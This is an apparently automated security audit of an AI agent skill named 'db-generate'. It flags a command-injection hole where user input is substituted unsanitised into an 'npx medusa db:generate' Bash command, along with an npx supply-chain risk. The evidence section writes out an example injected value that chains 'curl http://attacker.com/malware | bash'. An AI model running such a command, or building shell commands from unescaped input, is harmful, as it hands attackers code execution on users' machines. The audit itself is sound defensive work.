db-generate
Fail
Audited by Gen Agent Trust Hub on Feb 13, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill assembles a Bash command by directly replacing a placeholder with user-provided input.
- Ingestion Point: The
<module-name>argument provided by the user. - Capability Inventory: The
Bashtool is authorized to runnpx medusa db:generate:*commands. - Evidence: The instruction "Use the Bash tool to execute the command 'npx medusa db:generate ', replacing '' with the provided argument" in
SKILL.mdcreates a direct command injection vector. - Attack Vector: An attacker could provide a value like
brand; curl http://attacker.com/malware | bashwhich would result in the execution of the malicious script after the initial command fails or completes. - Sanitization: None detected. The skill lacks instructions to escape shell metacharacters or validate the input against a whitelist.
- [REMOTE_CODE_EXECUTION] (MEDIUM): The command uses
npx, which is designed to download and execute packages from the npm registry if they are not already installed locally. - Risk: While
medusais a known framework, the reliance on dynamic package fetching at runtime introduces a risk of executing malicious code if a typosquatted package name is used or if the npm registry is compromised.
Recommendations
- AI detected serious security threats
Audit Metadata